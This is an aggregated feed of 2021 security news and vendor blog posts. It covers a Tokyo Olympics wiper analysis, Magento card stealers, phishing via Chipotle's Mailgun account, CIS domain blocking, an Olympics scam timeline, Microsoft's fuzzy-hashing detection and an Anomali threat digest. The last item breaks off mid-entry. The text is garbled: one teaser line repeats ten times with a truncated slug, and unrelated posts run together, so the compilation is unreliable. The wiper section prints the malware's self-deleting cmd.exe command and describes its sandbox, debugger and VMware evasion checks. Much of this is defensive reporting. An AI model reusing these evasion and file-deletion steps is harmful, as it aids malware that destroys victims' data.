A new report said the Solarmarker campaign is being conducted by “fairly sophisticated” actors focusing their energy on credential and residual information theft.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.

card-stealer-malware-uses-new-evasion-teJavaScript Loaded by Malware From Blocked DomainsA new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.


Major sporting events, like the World Cup or the Olympics, are usually targets of cybercriminals that take advantage of the event’s popularity. During the 2018 World Cup, for example, an infected document disguised as a “game prediction” delivered malware that stole sensitive data from its victims, including keystrokes and screenshots.

A new malware threat emerged just before the 2020 Tokyo Olympics opening ceremony, able to damage an infected system by wiping its files. The malware disguises itself as a PDF document containing information about cyber attacks associated with the Tokyo Olympics. The wiper component deletes documents created using Ichitaro, a popular word processor in Japan. This wiper is much simpler than “Olympic Destroyer”, which was used to target the 2018 Winter Olympics.


The file was circulated under the name “【至急】東京オリンピック開催に伴うサイバー攻撃等発生に関する被害報告について”, which translates into “[Urgent] About damage reports regarding the occurrence of cyber attacks, etc. associated with the Tokyo Olympics”.

Screennshot of malware nameMalware name

The file is packed with UPX and was apparently compiled on “2021-07-19” at “22:52:05”, and although this information can’t be 100% reliable, this date is just one day before its first public appearance.

Screenshot showing details about the malware executableDetails about the malware executable

The developer included a lot of anti-analysis and anti-debugging techniques. The first one is a simple trick that detects if the file is being executed in a sandbox by using the APIs GetTickCount64 and Sleep.

First, the malware gets the current timestamp with GetTicketCount64 and then sleeps for 16 seconds. Then, it calls GetTicketCount64 again and checks how much time the code really took in the Sleep function. If the time is below 16 seconds, the malware exits since it’s likely that the Sleep function was bypassed by a sandbox environment.

Screenshot of common anti-analysis techniqueCommon anti-analysis technique

If the sandbox environment wasn’t detected at this point, the malware checks if there are any analysis tools by listing all the processes running in the OS and comparing against known tools, such as “wireshark.exe” or “idaq64.exe”.

The strings related to these processes are all encrypted inside the binary, and can be easily decrypted using a simple bitwise operation:

Screenshot decrypting a string from the wiper using PythonDecrypting a string from the wiper using Python

Using the same logic, we’ve created a script to extract and decrypt all the strings automatically, revealing important behavior from the malware:

Screenshot of the decrypted strings from the malwareSome of the decrypted strings from the malware

Another interesting technique this malware uses to check if it’s being debugged is by verifying breakpoints. For those not familiar with what happens “under the hood” when you create a software breakpoint, in summary, the debugger replaces the bytecode where you want to break with the one-byte instruction int3, which is represented by the opcode 0xCC. Therefore, when the processor finds this instruction, the program stops, and the control is transferred back to the debugger, which replaces the instruction again with the original byte.

Thus, this malware checks for the presence of the int3 instruction in the entry point of certain functions, by comparing the byte with 0xCC.

Screenshot of malware searching for software breakpointsMalware searching for software breakpoints

We also found verifications for other instructions aside from int3, such as call and jmp, demonstrating that the developer went even further to verify modifications in the original code.

Later, the malware also checks if the process is being debugged through the APIs IsDebuggerPresent and CheckRemoteDebuggerPresent. 

Also, the threat verifies if the environment is running under a virtual machine by checking the I/O port implemented by VMware hypervisor.

Screenshot showing malware checking if the process is running under VMware.Malware checking if the process is running under VMware.

If any sandbox, virtual machine, or analysis tools are detected, the malware calls a function that executes a command line that deletes itself.

cmd.exe /C ping -n 1 -w 3000 > Nul & Del /f /q “C:/Users/username/Desktop/wiper.exe”

Screenshot showing malware deleting itself after detecting a memory breakpointMalware deleting itself after detecting a memory breakpoint

Despite all these anti-analysis and anti-debugging tricks, the only goal of the malware is to run a sequence of commands that searches and deletes files with specific extensions:

Screenshot of commands executed by the malware to delete filesCommands executed by the malware to delete files

While these commands are being executed, the malware also tries to execute the “curl” program to request a pornographic website, likely to deceive forensic analysis in the machine.


Netskope Threat Labs is actively monitoring this campaign and has ensured coverage for all known threat indicators and payloads. 

Netskope Threat ProtectionTrojan.GenericKD.46658860Trojan.GenericKD.37252721Trojan.GenericKD.46666779Gen:Variant.Razy.861585Netskope Advanced Threat Protection provides proactive coverage against this threat.Gen.Malware.Detect.By.StHeur indicates a sample that was detected using static analysisGen.Malware.Detect.By.Sandbox indicates a sample that was detected by our cloud sandbox

Sample Hashes






The post Netskope Threat Coverage: 2020 Tokyo Olympics Wiper Malware appeared first on Netskope.







More than 120 messages caught trying to filch credentials from customers of USAA Bank, Microsoft

Between July 13 and July 16, someone took over the Mailgun account owned by restaurant chain Chipotle Mexican Grill and placed an order for login credentials using misappropriated marketing messages.…


U.S. State, Local, Tribal, and Territorial (SLTT) government organizations, schools, and hospitals are becoming increasingly reliant on technology. The Center for Internet Security’s (CIS’s) Malicious Domain Blocking and Reporting (MDBR) service has been protecting these entities from being targets of ransomware, malware, and phishing attacks. One year since its inception in July 2020, MDBR has blocked more than 1.5 billion requests to known bad web domains for public sector organizations.

Ransomware, Phishing, Malware: Small Actions for Mighty Returns

SLTT organizations house massive amounts of personal information including social security numbers, employee, patient, or student records, and billing information. It makes them prime targets for cyber-attacks as the payoff for this information is far greater than other stolen data such as credit card numbers.

What makes cyber-attacks successful is that a majority of them start with small actions. A phishing email, or a fake website URL that downloads malware on a computer. For example, malware most commonly finds its way into SLTT organizations through either malspam, unsolicited emails that either direct users to malicious websites or trick users into downloading or opening malware, or malvertisements, malware introduced through malicious advertisements. If the targeted user takes the bait an attacker can gain access to an entire database.

The 2020 Verizon Data Breach Investigations Report (DBIR) found that ransomware disproportionately affects the public sector (more than 60% of malware incidents vs. 27% of malware in all sectors).

For governments, hospitals, and schools this could mean public records being stolen, or worse, a full shut down of the institution itself until the money is paid.

Malicious Domain Blocking and Reporting (MDBR)

Protecting against these common types of attacks can be costly and time-consuming. The MDBR service from CIS is available at no cost to all U.S. SLTT organizations, as well as all public and private hospitals in the U.S., in partnership with technology provider Akamai.

MDBR technology prevents IT systems from connecting to harmful web domains, helping limit infections related to known malware, ransomware, phishing, and other cyber threats. This capability can block the vast majority of ransomware infections just by preventing the initial outreach to a ransomware delivery domain.

How MDBR Works:

MDBR proactively blocks network traffic from an organization to known harmful web domains, helping protect IT systems against cybersecurity threats. Once an organization points its domain name system (DNS) requests to the Akamai’s DNS server IP addresses, every DNS lookup will be compared against a list of known and suspected malicious domains. Attempts to access known malicious domains such as those associated with malware, phishing, and ransomware, among other threats, will be blocked and logged. CIS will then provide reporting that includes log information for all blocked requests and assist in remediation if needed.

Learn how MDBR shields organizations from cyber threats by watching our short video:

MDBR Expands Its Reach

MDBR was initially released to SLTT government entities at no cost in July 2020. Based on the early success in protecting these organizations the service was expanded to service public and private hospitals as well as K-12 schools.

At the end of May 2021, MDBR had received 222.4 billion DNS requests and blocked more than 1.5 billion of those requests to known bad web domains for public sector members. This represents 1.5 billion potential malware or ransomware infections that could have impacted these organizations.

Malware and phishing were the main types of attacks making up 72% of the domains blocked by MDBR for SLTTs in the last 12 months.

Adoption of this service continues to grow as the service can be implemented within 15 minutes or less and requires virtually no maintenance as CIS and Akamai fully maintain the systems required.

The post MDBR Stops Ransomware, Phishing, Malware, and More appeared first on CIS.


The 2020 Olympics are, after a bit of a delayed start, officially in full swing. So too is the possibility for scammers to crawl out of the woodwork. And while actual, measurable cyberrattacks and hacks surrounding The Olympics did not truly get rolling until 2008 in Beijing, The Olympic games have traditionally been quite the target for malicious acts of all kinds, dating back years. Shall we take a look?

1996 Atlanta

No sign of cyberattacks yet. A disaster is alluded to, but the disaster in question is down to slow websites for surfers, and faulty data transmission at the event itself. People getting up to mischief? Not so much.

2000 Sydney

You may (or may not!) remember Sydney being referred to as “The Internet Olympics”. It was also the first major Olympics event where organizers braced for hacking related impact. I recall quite a lot of articles at the time predicting all manner of doom and gloom scenarios. I’m sure Y2K bug fever didn’t help douse the fires of suspicion that things were about to go awry.

As it turns out, things did not go awry. A non-hacked games were enjoyed by all. Phew.

2002 Salt Lake City

By the time of the 2002 Olympics, experts responsible for locking down the winter event were in good spirits. Nothing happened at the 2000 games, and it seems nothing happened at any earlier events either. Once again, the primary concern outside security was reliability and hoping massively complex networks wouldn’t fall over during the games proper.

2004 Athens

The most interesting cyber story in the build up to the 2004 games was an infamous wiretapping incident in Athens. Some folks maintain there’s a strong possibility it was designed to grab all manner of calls from VIPs during the games. We’ll almost certainly never know for sure.

2006 Turin

This is spectacular (and you really should click, because it’s hard to put into words what is on view here). As you can see, things still aren’t really all that cyber in Olympics land. That’s about to change, however…

2008 Beijing

The Beijing Olympics are notable for what may be the first real slice of cyberattacks aimed at the games. Former Chief Executive of the British Olympic Association feared they’d been compromised. A number of sports-related organizations, including various National Olympic Commitees, the World Anti-Doping Agency, and the International Olympic Committee, were all targeted by “Operation Shady Rat,” according to McAfee. While unrelated organizations were also targeted over a five-year period, this definitely isn’t what anybody needs prior to an Olympic games.

An article from the time claims the “English language version” of the Olympics site was apparently compromised and redirected to some sort of loan company portal. However, there are so many official and unofficial sites from the time, it’s difficult to say what exactly that site is. Is it a fan site? A real portal? Did the article typo the URL? I’m not sure, and I can’t find it being mentioned anywhere else. We’re on less shaky ground with this tale of banner color alteration, in which it was claimed that color alterations made to a website were purposeful hacks meant to highlight human rights abuses.

There’s also an incredibly comprehensive run-down of hack-related happenings during the 2008 games here. In just two years, we’ve gone from “not much happening here, is there?” to “RED ALERT, THIS IS NOT A DRILL”. Fake ticket websites, bogus streams, websites belonging to athletes hacked, site defacements, and more.

Away from the official games content itself, people were targeted by other means. All of a sudden we have infectious email attachments, and compromised third-party sites serving up malware. Wherever you looked, there was a threat sprinting into view.

Hacking may have been slow off the blocks, but it was definitely an unofficial event by this point.

2010 Vancouver

I couldn’t really find much for the Vancouver Winter Olympics. The most interesting incident was probably a fake opening ceremonies website serving infections, via promotion from a bogus Twitter account. Not spectacular by any means, but one of the first examples of using Twitter as a jumping-off point for attacks during a major event.

2012 London

The London Olympics—the one where James Bond and the definitely real Queen jumped out of a helicopter—was a massive splash of malicious activity in internet terms.

By this point, security drills and planning were a major component of the games. I seem to recall reading about Canada doing extensive testing in the build-up to Vancouver, and simulated attacks detailed here were probably building on those efforts. According to that article, China was “subject to about 12 million online attacks per day” during the 2008 games. War-gaming and using “an in-house team of pretend hackers,” as they put it, makes a lot of sense.

Articles warning of dangers mainly focused on search engine poisoning (still a threat back in 2012), fake sites, streaming, and once again Twitter makes an appearance as “one to watch.” There’s also the occasional warning about dubious Wi-Fi hotspots.

In terms of actual attacks which took place, we see the rise of mobile as a way in for Olympics scams. Russian sites hosted Trojans claiming to be official 2012 game apps. Yes, games thrown into the mix alongside mobile. What a combo! Email spam promising free airline tickets to see the games is a timeless social media scam also repackaged for this sporting event. Here, you’d get nothing but survey scams.

Elsewhere, there were threats to power supplies made prior to the opening ceremony. There was also this frankly incredible tale of traffic lights, in which Vanity Fair reported that London manipulated its own traffic light system to change any red lights to green lights for officials who were scouting the city for the initial Olympic bidding process. We’ll save the best for last, and by best I do of course mean worst—an opening ceremony conspiracy theory claiming to foreshadow COVID-19. Because hey, why not.

2014 Sochi

The “You’re definitely going to be hacked in Russia” framing went into a bit of overdrive during the build up to these particular games. Indeed, that specific story regarding how easy it was to be compromised in Sochi drew a fair amount of heat.

Even much more reserved commentary pieces labelled it a “cyber war zone.” Which is interesting, because the real fireworks would arrive at later events.

2016 Rio de Janeiro

The Rio Olympics had their now traditional opening ceremony of “here come the scams.” We can see clear patterns developing over time as scammers dust off their tried and tested sporting fakeouts.

Fake tickets and lottery winnings start doing their thing. So, too, do fake ticket sites, TV promotions, and even something offering world champion status in the “amorous olympics”! Phishing and bogus domains remained a strong contender for taking the scammer gold medal, with ATM carding grabbing a runner-up spot.

Ransomware put in a less than sporting appearance, via a compromised federation website. The RIG exploit kit was also lying in wait for anyone searching for Rio cake instructions—as in the actual baked dessert—which I must admit, I didn’t see coming.

All things banking are considered a problem point in Brazil in terms of hacks and malware, so there were plenty of warnings for visitors surrounding that too. You’ll notice alongside the mainstay threats there are some new additions beginning to seep in. New techniques and tactics will continue to emerge as we move from event to event. We’ll finish off with 2016 by linking to Anonymous branded attempts to highlight the less entertaining activities happening off camera.

2018 Pyeongchang

A strong start for Team Cybercriminal as they deploy “Olympic Destroyer,” whose name is if nothing else incredibly accurate as a mission statement. After various threats down the years to interfere with the opening ceremony, the bad people finally get their wish and caused chaos.

We take a quick dip back into mobile land, as more bad apps roll into action. In this case, one app claimed to be a livestream application showing highlights. In reality, the app crashed a lot but displayed a tireless ability to pop adverts without fail.

We round this brief summary off with a worrying slice of alleged nation state attack. US officials claimed that Russian spies compromised multiple computers, and made it look as though North Korea was responsible.

Actually, no. We’ll end this summary with a bit of an epilogue to the games, some months after it had taken place. A very nasty attack there, in which Russian hackers were accused of leaking the private medical information of US Olympians Simone Biles and Venus and Serena Williams, in a reported attempt to downplay the severity of Russia’s involvement in an Olympic doping scandal.

2020 Tokyo

And now we come to the current games held in Japan. Things began early, with Twitter account compromises in February. Picking up where we left off last time, state-backed attacks from Russia were planned before the games were postponed due to the pandemic. We’ve now got the traditional alarms being sounded, but it remains to be seen where the big hits hammer home. There is evidence of malware bouncing around though, in the form of Wiper malware targeting Japanese computers.

What we can say is that law enforcement are also ringing the big “please be careful” bell. The FBI put out a warning a week ago, and sure enough, a small leak has already taken place.

People should ensure they’re running the latest version of their operating system, their security software is up to date, and think very carefully where offers, freebies, discounts, streaming, mobile apps, or too-good-to-be-true emails are concerned.

These are tried and tested methods for Olympics scammers, and they’re becoming very good at it. Let’s see if we can make them come in last place for a change.

The post The Olympics: a timeline of scams, hacks, and malware appeared first on Malwarebytes Labs.


RiskIQ’s research team leverages our Internet Intelligence Graph to analyze known campaigns of widely used malware families to fingerprint trends in malicious infrastructure. We recently continued our analysis of Agent Tesla, leading us to identify the XAMPP web server solutions stack being used to serve Agent Tesla and Formbook malware. 

This latest analysis shines new light on the Agent Tesla ecosystem, the TTPs its operatives are using, and how RiskIQ users can now leverage the XAMPP web component to identify hosts that distribute malware and research other potentially malicious infrastructure. 


You can’t control the weather. But you can safeguard your downstream infrastructure investment.

Today’s cybersecurity threats continue to find ways to fly and stay under the radar. Cybercriminals use polymorphic malware because a slight change in the binary code or script could allow the said threats to avoid detection by traditional antivirus software. Threat actors customize their wares specific to their target organizations to increase their chances of breaking into and moving laterally through an entire corporate network, exfiltrating data, and leaving with little or no trace. The underground economy is rife with malware builders, Trojanized versions of legitimate applications, and other tools and services that allow malware operators to deploy highly evasive malware.

As the number of threats seen in the wild continues to increase exponentially, the continued evolution and innovation of their evasion tactics create a scenario where most malware is seen only once. Therefore, in today’s threat landscape, security solutions should no longer be just about the number of unique malware they can detect. Instead, they should deliver durable solutions that can defend against existing as well as future attacks. This requires comprehensive visibility into threats, coupled with the ability to process vast amounts of data. Microsoft 365 Defender provides such a capability using its cross-domain optics and the transformation of data into actionable security information through innovative applications of AI and machine learning methodologies.

We have previously discussed how we apply deep learning in detecting malicious PowerShell, exploring new approaches to classify malware, and in detecting threats via the fusion of behavior signals. In this blog post, we discuss a new approach that combines deep learning with fuzzy hashing. This approach utilizes fuzzy hashes as input to identify similarities among files and to determine if a sample is malicious or not. Then, a deep learning methodology inspired by natural language processing (NLP) better identifies similarities that actually matter, thus improving detection quality and scale of deployment.

This model aims to improve the overall accuracy of classifying malware and continue closing the gap between malware release and eventual detection. It can detect and block malware at first sight, a critical capability in defending against the wide range of threats, including sophisticated cyberattacks.

Case study: New NOBELIUM-related malware blocked at first sight

In March this year, Microsoft 365 Defender successfully blocked a file that would later be confirmed as a variant of the GoldMax malware. GoldMax, a command-and-control backdoor that persists on networks as a scheduled task impersonating systems management software, is part the of tools, tactics, and procedures (TTPs) of NOBELIUM, the threat actor behind the attacks against SolarWinds in December 2020.

Microsoft was able to proactively defend its customers from this newly discovered GoldMax variant because it leveraged two main technologies: fuzzy hashing, which serves as the input, and deep learning techniques inspired by NLP and computer vision, among others.

The earliest GoldMax sample, which Microsoft detects as Trojan:Win64/GoldMax.A!dha, was first submitted on VirusTotal in September 2020. While the new file was confirmed to be GoldMax variant in June 2021, or three months after Microsoft first blocked it, we started defending customers as soon as we saw it. As seen in the screenshots below, the new file’s TLSH and SSDEP hashes—the fuzzy hashes exposed on VirusTotal—are observably similar to the first GoldMax variant. Both files also have the exact ImpHash and file size, further supporting our initial conclusion that the second file is also part of the GoldMax family.

Screenshots of showing file properties of original GoldMax malware and the new variant

Figure 1. File properties of the first GoldMax variant (top) and the new file detected in March (bottom) (from VirusTotal)

In the next sections, we discuss fuzzy hashes and how we use them in conjunction with deep learning to detect new and unknown threats.

Understanding fuzzy hashes

Hashing has become an essential technique in malware research literature and beyond because its output—hashes—are commonly used as checksums or unique identifiers. For example, it is common practice to use SHA-256 cryptographic hash to query a knowledge database like VirusTotal to determine whether a file is malicious or not. The first antivirus products operated this way before antivirus signatures existed.

However, to identify or detect similar malware, traditional cryptographic hashing poses a challenge because of its inherent property called cryptographic diffusion, whose purpose is to hide the relationship between the original entity and the hash so that these are still considered one-way functions. With this property, even a minimal change in the original entity—in this case, a file—yields a radically different, undetected hash.

Below are screenshots that illustrate this principle. The word change in the text file and the resulting change in the MD5 hash represent the effect of changes in binary content of other files:

Screenshots of two text files opened in Notepad showing a minor difference in text and comparing their MD5 hashes

Figure 2. Example of cryptographic hashing

Fuzzy hashing breaks the aforementioned cryptographic diffusion while still hiding the relationship between entity and hash. In doing so, this method provides similar resulting hashes when given similar inputs. Fuzzy hashing is the key to finding new malware that looks like something we have seen previously.

Like cryptographic hashes, there are several algorithms to calculate a fuzzy hash. Some examples are Nilsimsa, TLSH, SSDEEP, or sdhash. Using the previous text files example, below is a screenshot of their SSDEEP hashes. Note how observably similar these hashes are because there is only a one-word difference in the text:

Screenshot of Windows PowerShell showing fuzzy hashing for two text files

Figure 3. Example of fuzzy hashing

The main benefit of fuzzy hashes is similarity. Since these hashes can be calculated on several parts or the entirety of a file, we can focus on hash sequences that are like one another. This is important in determining the maliciousness of a previously undetected file and in categorizing malware according to type, family, malicious behavior, or even related threat actor.

Fuzzy hashes as “natural language” for deep learning

Deep learning in its many applications has recently been remarkable at modeling natural human language. For example, convolutional architectures, recursive architectures like Gated Recurrent Units (GRUs) or Long Short Term Memory networks (LSTMs), and most recently attention-based networks like all the variants of Transformers have been proven to be state-of-the-art in tackling human language tasks like sentiment analysis, question answering, or machine translation. As such, we explored if similar techniques can be applied to computer languages like binary code, with fuzzy hashing as an intermediate step to reduce sequence complexity and length of the original space. We discovered that segments of fuzzy hashes could be treated as “words,” and some sequences of such words could indicate maliciousness.

Architecture overview and deployment at scale

A common deep learning approach in dealing with words is to use word embeddings. However, because fuzzy hashes are not exactly natural language, we could not simply use pre-trained models. Instead, we needed to train our embeddings from scratch to identify malicious indicators.

Once with these embeddings, we attempted to do most things with a language deep neural network. We explored different architectures using standard techniques from literature, explored convolutions over these embeddings, attempted with multilayer perceptrons, and tried traditional sequential models (like the previously-mentioned LSTM and GRU) and attention-based networks (Transformers).

Diagram showing architecture of fuzzy hashing model

Figure 4. Architecture overview of the deep learning model using fuzzy hashes

We got fairly good results with most techniques. However, to deploy and enable this model to the Microsoft 365 Defender, we looked into other factors like inference times and the number of parameters in the network. Inference time ruled out the sequential models because even though they were the best in terms of precision or recall, they are the slowest to run inference on. Meanwhile, the Transformers we experimented on also yielded excellent results but had several million parameters. Such parameters will be too costly to deploy at scale .

That left us with the convolutional approach and multilayer perceptron. The perceptron yielded slightly better results between these two because the spatial adjacency intrinsically provided by the convolutional filters does not properly capture the relationship among the embeddings.

Once we had landed on a viable architecture, we used modern tools available to us that Microsoft continues to extend. We used Azure Machine Learning GPU capabilities to train these models at scale, then exported them to Open Neural Network Exchange (ONNX), which gave us the extra performance we needed to operationalize this at scale on Microsoft Defender Cloud.

Deep learning fuzzy hashes: Looking for the similarities that matter

A question that arises from an approach like this is: why use deep learning at all?

Adding machine learning allows us to learn which similarities on fuzzy hashes matter and which ones don’t. Additionally, adding deep learning and training on vast amounts of data increases the accuracy of malware classification and allows us to understand the minor nuances that differentiate legitimate software from its malware or Trojanized versions.

A deep learning approach also has its inherent benefits, one of which is creating big pre-trains on massive amounts of data. One can then reuse this model for different classification, clustering, and other scenarios by using its transfer learning properties. This is similar to how modern NLP approaches language tasks, like how OpenAI’s GPT3 solves question answering.

Another inherent benefit of deep learning is that one does not have to retrain the model from scratch. Since new data is constantly flowing into the Microsoft Defender Cloud, we can fine-tune the model with these incoming data to adapt and quickly respond to an ever-changing threat landscape.

Conclusion: Continuing to harness the immense potential of deep learning in security

Deep learning continues to provide opportunities to improve threat detection significantly. The deep learning approach discussed in this blog entry is just one of the ways we at Microsoft apply deep learning in our protection technologies to detect and block evasive threats. Data scientists, threat experts, and product teams work together to build AI-driven solutions and investigation experiences.

By treating fuzzy hashes as “words” and not mere codes, we proved that natural language techniques in deep learning are viable methods to solve the current challenges in the threat landscape. This change in perspective presents different possibilities in cybersecurity innovation that we are looking forward to exploring further.

Numerous AI-driven technologies like this allow Microsoft 365 Defender to automatically analyze massive amounts of data and quickly identify malware and other threats. As the GoldMax case study showed, the ability to identify new and unknown malware is a critical aspect of the coordinated defense that Microsoft 365 Defender delivers to protect customers against the most sophisticated threats.

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft 365 Defender.


Edir Garcia Lazo

Microsoft 365 Defender Research Team

The post Combing through the fuzz: Using fuzzy hashing and deep learning to counter malware detection evasion techniques appeared first on Microsoft Security Blog.

The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cryptojacking, Downloaders, Malspam, RATs, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Windows “PetitPotam” Network Attack – How to Protect Against It

(published: July 21, 2021)

Microsoft has released mitigations for a new Windows vulnerability called PetitPotam. Security researcher, Gilles Lionel, created a proof-of-concept script that abuses Microsoft’s NT Lan Manager (NTLM) protocol called MS-EFSRPC (encrypting file system remote protocol). PetitPotam can only work if certain system functions that are enabled if the following conditions are met: NTLM authentication is enabled on domain, active directory certificate services (AD CS) is being used, certificate authority web enrollment or certificate enrollment web service are enabled. Exploitation can result in a NTLM relay attack, which is a type of man-in-the-middle attack.
Analyst Comment: Microsoft has provided mitigation steps to this attack which includes disabling NTLM on a potentially affected domain, in addition to others.
Tags: Vulnerability, Microsoft, PetitPotam, Man-in-the-middle

APT31 Modus Operandi Attack Campaign Targeting France

(published: July 21, 2021)

The French cybersecurity watchdog, ANSSII issued an alert via France computer emergency response team (CERT) discussing attacks targeting multiple French entities. The China-sponsored, advanced persistent threat (APT) group APT31 (Judgment Panda, Zirconium) has been attributed to this ongoing activity. The group was observed using “a network of compromised home routers as operational relay boxes in order to perform stealth reconnaissance as well as attacks.”
Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place.
MITRE ATT&CK: [MITRE ATT&CK] Resource Hijacking – T1496
Tags: APT, APT31, Judgment Panda, Zirconium, Home routers

StrongPity APT Group Deploys Android Malware for the First Time

(published: July 21, 2021)

Trend Micro researchers conducted analysis on a malicious APK sample shared on Twitter by MalwareHunterTeam. The shared sample was discussed as being a trojanized version of an Android app offered on the authentic Syrian E-Gov website, potentially via a watering-hole attack. Researchers took this information and pivoted further to analyze the backdoor functionality of the trojanized app (which is no longer being distributed on the official Syrian E-Gov website). Additional samples were identified to be contacting URLs that are identical to or following previous reporting on the advanced persistent threat (APT) group StrongPity in 2019 and 2020. The group is believed to be actively developing new backdoors for Android operating systems, as is evident by new modules for stealing different types of messages from infected devices.
Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Use the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. In addition, it is important to review the permissions that the application will request, and comments from others who have downloaded the application. Furthermore, it is paramount that mobile devices be kept up-to-date with the latest security patches and employ trusted antivirus software.
Tags: APT, StrongPity, Android

Top Prevalent Malware with a Thousand Campaigns Migrates to macOS

(published: July 21, 2021)

The notorious Formbook information-stealing malware has once again undergone changes, according to Check Point researchers. The malware started as a simple keylogger over five years ago (later became known as XLoader in February 2020,) and now can steal data from machines running macOS or Windows. XLoader is offered for purchase on multiple forums from prices ranging from $69 (USD) to $139 depending on the site and additional malware features. Formbook/XLoader is capable of keylogging, stealing credentials from web browsers, taking screenshots, and downloading and executing additional files per communication from a command and control server.
Analyst Comment: Information stealing is a common and prevalent threat facing individuals and organizations around the world. Education on frequently-used delivery methods such as malspam and phishing emails can help prevent infection. In addition, maintain efficient log management policies to identify potentially abnormal network activity.
MITRE ATT&CK: [MITRE ATT&CK] Third-party Software – T1072
Tags: Info stealer, Formbook, XLoader, Windows, macOS

Windows Elevation of Privilege Vulnerability

(published: July 20, 2021)

A new Windows 10 vulnerability, assigned CVE-2021-36934 and referred to as HiveNightmare/SeriousSAM, has been found to affect all Windows 10 versions beginning with build 1809. The issue arises from non-admin users being granted read access to any file in the %windir%system32config directory that can allow for local privilege escalation. If a virtual shadow copy [service] (VSS), which is a Microsoft Windows feature that can create backups or snapshots of files or volumes, of the system is available, a non-admin user can abuse these files for malicious activity.
Analyst Comment: Microsoft has issued workarounds for CVE-2021-36934, specifically, to run a command “icacls %windir%system32config*.* /inheritance:e” to delete VSS shadow copies. However, deleting shadow copies could negatively impact restoring operations for Microsoft and third-party services. Microsoft stated, “You must restrict access and delete shadow copies to prevent exploitation of this vulnerability.”
Tags: Vulnerability, Windows 10, CVE-2021-36934, Privilege escalation

New Attacks on Kubernetes via Misconfigured Argo Workflow

(published: July 20, 2021)

A new attack vector has been discovered targeting Kubernetes (K8s) clusters through misconfigured Argo Workflows instances, according to Intezer researchers. Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes, according to its documentation. One misconfigured Argo Workflows cluster was found to running a kannix/monero cryptocurrency miner.
Analyst Comment: As any system that stores potentially sensitive information, cloud containers need to be configured properly to avoid threat actors from targeting them. Ensure that environments have security policies in place, such as the principle of least privilege, to ensure that permissions are only granted to those on a need-access basis.
MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts – T1078 | [MITRE ATT&CK] Resource Hijacking – T1496
Tags: Argo Worklows, Kubernetes, Misconfigured, Cryptomining

Debugging MosaicLoader, One Step at a Time

(published: July 20, 2021)

Bitdefender researchers have reported their findings on a new malware family dubbed MosaicLoader. The malware was discovered when researchers noticed “processes that add local exclusions in Windows Defender for specific file names (prun.exe, appsetup.exe, etc.), that all reside in the same folder, called PublicGaming.” The malware is delivered through archives masquerading as cracked software installers. That threat actors are then purchasing Google search engine results to boost their malicious archives’ visibility and potential delivery. MosaicLoader can deliver any other kind of malware and utilizes a unique obfuscation technique that shuffles code chunks creating a mosaic-like structure.
Analyst Comment: Cracked software is a well-known and common delivery method for malicious payloads or first-stage infections. Always check to ensure that you are downloading software from the legitimate website for the desired product.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Software Discovery – T1518 | [MITRE ATT&CK] Remote Services – T1021 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071
Tags: Malware loader, MosaicLoader, Cracked software

CVE-2021-3438: 16 Years in Hiding – Millions of Printers Worldwide Vulnerable

(published: July 20, 2021)

A high-severity vulnerability, registered as CVE-2021-3438, has been identified by SentinelLabs researchers that affects HP, Samsung, and Xerox printers. The vulnerability has resided in the printers’ driver software since 2005. The number of printers created by HP, Samsung, and Xerox during the last 16 years amounts to over 380 different models by HP and Samsung and at least 12 Xerox models. Exploitation of CVE-2021-3438, which is a kernel driver vulnerability, can result in an unprivileged user account changing to “SYSTEM account and run code in kernel mode (since the vulnerable driver is locally available to anyone).” Researchers note that they have not seen this vulnerability actively-exploited in the wild.
